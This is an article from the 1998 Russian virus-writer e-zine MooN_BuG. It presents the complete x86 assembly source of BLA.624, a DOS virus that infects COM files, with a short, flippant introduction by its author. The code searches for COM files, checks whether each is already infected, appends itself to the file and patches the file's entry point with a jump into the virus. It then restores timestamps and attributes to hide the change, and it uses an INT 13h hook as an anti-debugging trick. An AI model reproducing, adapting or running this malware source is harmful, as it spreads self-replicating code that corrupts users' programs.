[TulaAnti&ViralClub] PRESENTS ...
MooN_BuG, Issue 5, May 1998 file 003
Вирус BLA.624
by RedArc
В этом вирусе нет ничего необычного и тем более офигительного... Он был
написан от нефиг делать во время прослушивания лекции по математическому
моделированию... Обычный сирч, но мне он чем то все же понравился и я не
просто не выкинул листок с его исходником, а даже не поленился набить... Вот,
посмотрите, может и вам из него чего понравится ;)
Дык как всегда я поленился нацарапать комментарии... ;)
=== Cut ===
Model Tiny
.code
.286
org 100h
start:
dw 0103h
jmp Entry
db 100h dup (90h)
Entry:
pusha
xor ax,ax
mov es,ax
mov ah,byte ptr cs:[si+1]
xchg ax,di
mov bp, word ptr cs:[di+3]
add bp,di
add bp,3
xchg ax,di
mov al,ah
add al,ah
xor ah,ah
add bp,ax
mov ax,es:[13h*4]
mov [bp+DATES-2],ax
mov ax,es:[13h*4+2]
mov [bp+DATES-4],ax
mov ax,bp
add ax,MyInt
mov es:[13h*4],ax
mov ax,ds
mov es:[13h*4+2],ax
mov ax,bp
int 13h
mov es:[0FFh*4],ax
mov si,bp
add si,DATES
mov ax,ss
mov SS_SAVE,AX
mov ax,cs
mov ss,ax
mov di,sp
mov ax,cs
mov ss,ax
mov sp,si
mov ax,es:[0FFh*4]
dec al
cmp ax,1997h
jnz Entry
mov ax,[bp+DATES-2]
mov es:[13h*4],ax
mov ax,[bp+DATES-4]
mov es:[13h*4+2],ax
push cs
pop es
call REST_BYTE
db 0ffh
mov di,sp
mov ax,cs
mov ss,ax
mov sp,si
call SET_DTA_VIR
db 0feh
mov di,sp
mov ax,cs
mov ss,ax
mov sp,si
call FIND_FIRST
db 0fdh
L1:
jb Not_Found
mov di,sp
mov ax,cs
mov ss,ax
mov sp,si
call TEST_FILE
db 0fch
BBB:
mov di,sp
mov ax,cs
mov ss,ax
mov sp,si
jc INFECTED
call CLOSE_FILE
db 0fbh
mov di,sp
mov ax,cs
mov ss,ax
mov sp,si
call FIND_NEXT
db 0fah
jmp L1
INFECTED:
call PLAGUE
db 0f0h
clc
jmp short BBB
Not_Found:
mov di,sp
mov ax,cs
mov ss,ax
mov sp,si
call SET_DTA_PROG
db 0efh
popa
push si
ret
dd ?
DATES equ $-Entry
MASK_FILE equ $-Entry
db 'БЛЯДЬ', 0h
SS_SAVE dw ?
REST_BYTE:
mov sp,di
L_1 equ $-Entry
mov byte ptr ds:[100h],0cdh
L_2 equ $-Entry
mov byte ptr ds:[101h],020h
L_3 equ $-Entry
mov byte ptr ds:[102h],90h
L_4 equ $-Entry
mov byte ptr ds:[103h],90h
L_5 equ $-Entry
mov byte ptr ds:[104h],90h
mov di,[si-2]
inc di
push di
ret
db 0eeh
SET_DTA_VIR:
mov ax,SS_SAVE
mov ss,ax
mov sp,di
mov ah,1ah
mov dx,bp
add dx,MyLen+5
mov bx,dx
int 21h
mov di,[si-2]
inc di
push di
ret
db 0edh
SET_DTA_PROG:
mov ax,SS_SAVE
mov ss,ax
mov sp,di
mov ah,1ah
mov dx,80h
mov bx,dx
int 21h
mov di,[si-2]
inc di
push di
ret
db 0ech
FIND_FIRST:
mov ax,SS_SAVE
mov ss,ax
mov sp,di
mov di,bp
add di,MASK_FILE
push di
mov [di],'.*'
mov byte ptr ds:[di+4],'m'
mov [di+2],'oc'
mov ah,4eh
mov cx,0ffh
mov dx,di
int 21h
pop di
mov [di],'ЛБ'
mov byte ptr ds:[di+4], 'Ь'
mov [di+2],'ДЯ'
mov di,[si-2]
inc di
push di
ret
db 0ebh
FIND_NEXT:
mov ax,SS_SAVE
mov ss,ax
mov sp,di
mov ah,4fh
int 21h
mov di,[si-2]
inc di
push di
ret
db 0eah
TEST_FILE:
mov ax,SS_SAVE
mov ss,ax
mov sp,di
mov ax,3d02h
mov dx,bp
push dx
add dx,MyLen+5+1eh
int 21h
xchg ax,bx
mov ah,3fh
pop dx
add dx,MyLen
push dx
mov cx,5
int 21h
pop di
mov ah,[di]
cmp ah,03h
je ALREADY
mov ax,[di]
cmp ax,4d5ah
je ALREADY
cmp ax,5a4dh
je ALREADY
stc
jmp short AAA_
ALREADY:
clc
AAA_:
mov di,[si-2]
inc di
push di
ret
db 0e0h
CLOSE_FILE:
mov ax,SS_SAVE
mov ss,ax
mov sp,di
mov di,bp
add di,MyLen+5
mov cx,[di+16h]
mov dx,[di+18h]
mov ax,5701h
int 21h
mov ah,3eh
int 21h
xor cx,cx
mov cl,byte ptr ds:[di+15h]
mov dx,di
add dx,1eh
mov ax,4301h
int 21h
mov di,[si-2]
inc di
push di
ret
db 0dfh
PLAGUE:
mov ax,SS_SAVE
mov ss,ax
mov sp,di
mov di,bp
mov al,byte ptr [di+MyLen]
mov byte ptr [di+L_1+4],al
mov al,byte ptr [di+MyLen+1]
mov byte ptr [di+L_2+4],al
mov al,byte ptr [di+MyLen+2]
mov byte ptr [di+L_3+4],al
mov al,byte ptr [di+MyLen+3]
mov byte ptr [di+L_4+4],al
mov al,byte ptr [di+MyLen+4]
mov byte ptr [di+L_5+4],al
mov ax,4202h
xor cx,cx
xor dx,dx
int 21h
and ax,0f000h
cmp ax,0f000h
jnz Len_Tested
jmp EXIT_PLAGUE
Len_Tested:
mov dx,bp
mov cx,MyLen
mov ah,40h
int 21h
mov ax,4200h
xor cx,cx
xor dx,dx
int 21h
add di,MyLen
mov byte ptr [di],03h
mov byte ptr [di+1],01h
mov ax,[di+5+1ah]
mov byte ptr [di+2],0e9h
sub ax,5
mov [di+3],ax
xchg dx,di
mov cx,5
mov ah,40h
int 21h
EXIT_PLAGUE:
mov di,[si-2]
inc di
push di
ret
MyInt equ $-Entry
mov ax,1998h
iret
MyLen equ $-Entry
END START
=== Cut ===
